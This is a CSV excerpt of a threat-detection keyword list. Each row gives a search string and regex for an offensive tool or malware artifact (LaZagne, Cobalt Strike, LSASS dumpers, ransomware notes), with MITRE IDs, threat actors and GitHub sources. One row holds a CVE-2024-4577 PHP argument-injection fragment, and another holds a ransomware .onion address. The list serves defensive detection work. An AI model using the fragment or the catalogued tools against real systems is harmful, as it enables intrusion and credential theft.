"*akoofbljmjeodfmdpjndmmnifglppjdi*",".{0,1000}akoofbljmjeodfmdpjndmmnifglppjdi.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","0","#browser_extensionid","https://github.com/mthcht/awesome-lists/blob/41d3934b5b76aaf7555d980197d1e8b5c55f1fb3/Lists/Browser%20Extensions/browser_extensions_list.csv#L2","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","33775"
"*akuafif/hXOR-Packer*",".{0,1000}akuafif\/hXOR\-Packer.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","1","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","33776"
"*AlanFramework.git*",".{0,1000}AlanFramework\.git.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33777"
"*Albertino RAT v2.2/*",".{0,1000}Albertino\sRAT\sv2\.2\/.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33778"
"*Alcatraz.sln*",".{0,1000}Alcatraz\.sln.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","33779"
"*Alcatraz.vcxproj*",".{0,1000}Alcatraz\.vcxproj.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","33780"
"*Alcatraz/obfuscator*",".{0,1000}Alcatraz\/obfuscator.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","33781"
"*Alcatraz-master.zip*",".{0,1000}Alcatraz\-master\.zip.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","33782"
"*AlessandroZ/BeRoot*",".{0,1000}AlessandroZ\/BeRoot.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","33783"
"*AlessandroZ/LaZagne*",".{0,1000}AlessandroZ\/LaZagne.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","33784"
"*Alexander Hagenah (@xaitax)*",".{0,1000}Alexander\sHagenah\s\(\@xaitax\).{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","#content","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","33785"
"*alexa-top-20000-sites.txt*",".{0,1000}alexa\-top\-20000\-sites\.txt.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","33786"
"*AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits*",".{0,1000}AlexisAhmed\/CVE\-2022\-0847\-DirtyPipe\-Exploits.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","1","#linux","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","33787"
"*alex-sector/dns2tcp*",".{0,1000}alex\-sector\/dns2tcp.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","33788"
"*Ali-DaNGer File Registerator*",".{0,1000}Ali\-DaNGer\sFile\sRegisterator.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33789"
"*Ali-DaNGer File Registerator.exe*",".{0,1000}Ali\-DaNGer\sFile\sRegisterator\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33790"
"*al-khaser*",".{0,1000}al\-khaser.{0,1000}","offensive_tool_keyword","al-khaser","al-khaser is a PoC malware application with good intentions that aims to stress your anti-malware system. It performs a bunch of common malware tricks with the goal of seeing if you stay under the radar","T1055 - T1117 - T1218 - T1003 - T1552","TA0002 - TA0008 - TA0006","N/A","N/A","Exploitation tool","https://github.com/LordNoteworthy/al-khaser","1","0","N/A","N/A","N/A","10","6275","1199","2025-04-21T19:59:55Z","2015-11-12T18:35:16Z","33791"
"*---All Azure AD User Principal Names---*",".{0,1000}\-\-\-All\sAzure\sAD\sUser\sPrincipal\sNames\-\-\-.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","33792"
"*All Done! Hack the planet!*",".{0,1000}All\sDone!\sHack\sthe\splanet!.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","33793"
"*All Dump files will be stored in C:\\Users\\Public*",".{0,1000}All\sDump\sfiles\swill\sbe\sstored\sin\sC\:\\\\Users\\\\Public.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","33794"
"*All EDR drivers were successfully removed from Kernel callbacks!*",".{0,1000}All\sEDR\sdrivers\swere\ssuccessfully\sremoved\sfrom\sKernel\scallbacks!.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","33795"
"*All files on each host have been encrypted with a strong algorithm.*",".{0,1000}All\sfiles\son\seach\shost\shave\sbeen\sencrypted\swith\sa\sstrong\salgorithm\..{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","33796"
"*All good in the hood. Check Temp for test.txt*",".{0,1000}All\sgood\sin\sthe\shood\.\sCheck\sTemp\sfor\stest\.txt.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","33797"
"*All Your <span>Important Files</span> Have Been Encrypted*",".{0,1000}All\sYour\s\<span\>Important\sFiles\<\/span\>\sHave\sBeen\sEncrypted.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","33798"
"*All your important files (documents, photos, videos, databases, and other files) have been encrypted using a strong encryption algorithm. You are unable to access these files as they have been transformed into unreadable content*",".{0,1000}All\syour\simportant\sfiles\s\(documents,\sphotos,\svideos,\sdatabases,\sand\sother\sfiles\)\shave\sbeen\sencrypted\susing\sa\sstrong\sencryption\salgorithm\.\sYou\sare\sunable\sto\saccess\sthese\sfiles\sas\sthey\shave\sbeen\stransformed\sinto\sunreadable\scontent.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","33799"
"*All Your Important Files Have Been Encrypted*",".{0,1000}All\sYour\sImportant\sFiles\sHave\sBeen\sEncrypted.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","33800"
"*All_SubdomainTOP_Seclist.txt*",".{0,1000}All_SubdomainTOP_Seclist\.txt.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","#linux","N/A","N/A","10","2139","396","2024-06-27T10:07:42Z","2019-07-26T10:26:34Z","33801"
"*Allocated shellcode memory in the target process: *",".{0,1000}Allocated\sshellcode\smemory\sin\sthe\starget\sprocess\:\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","N/A","9","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","33802"
"*Allocated shellcode memory in the target process: *",".{0,1000}Allocated\sshellcode\smemory\sin\sthe\starget\sprocess\:\s.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","#content","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","33803"
"*Allow Multiple RDP (Remote Desktop) Sessions By Patching termsrv.dll File*",".{0,1000}Allow\sMultiple\sRDP\s\(Remote\sDesktop\)\sSessions\sBy\sPatching\stermsrv\.dll\sFile.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","9","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","33804"
"*allow_url_include%3d1+-d+auto_prepend_file%3dphp://input*",".{0,1000}allow_url_include\%3d1\+\-d\+auto_prepend_file\%3dphp\:\/\/input.{0,1000}","offensive_tool_keyword","POC","CVE-2024-4577 POC exploitation","T1190 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/watchtowrlabs/CVE-2024-4577","1","1","N/A","N/A","10","3","275","62","2024-06-22T15:13:52Z","2024-06-07T09:52:54Z","33805"
"*AllowDelegationUsers.txt*",".{0,1000}AllowDelegationUsers\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","33806"
"*AllowDelegationUsers_samaccountnames_only.txt*",".{0,1000}AllowDelegationUsers_samaccountnames_only\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","33807"
"*almandin/krbjack*",".{0,1000}almandin\/krbjack.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","N/A","10","2","113","21","2025-01-22T18:12:00Z","2023-04-16T10:44:55Z","33809"
"*AlmondOffSec/PassTheCert*",".{0,1000}AlmondOffSec\/PassTheCert.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","1","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","33810"
"*ALPC-TaskSched-LPE*",".{0,1000}ALPC\-TaskSched\-LPE.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","33811"
"*ALPC-TaskSched-LPE.*",".{0,1000}ALPC\-TaskSched\-LPE\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","33812"
"*Alphabug_CS*",".{0,1000}Alphabug_CS.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","33813"
"*Alphabug_CS*",".{0,1000}Alphabug_CS.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","33814"
"*AlphabugX/csOnvps*",".{0,1000}AlphabugX\/csOnvps.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","33815"
"*AlphabugX/csOnvps*",".{0,1000}AlphabugX\/csOnvps.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","33816"
"*alphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad.onion*",".{0,1000}alphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","33818"
"*Already in high integrity, no need to privesc!*",".{0,1000}Already\sin\shigh\sintegrity,\sno\sneed\sto\sprivesc!.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","33819"
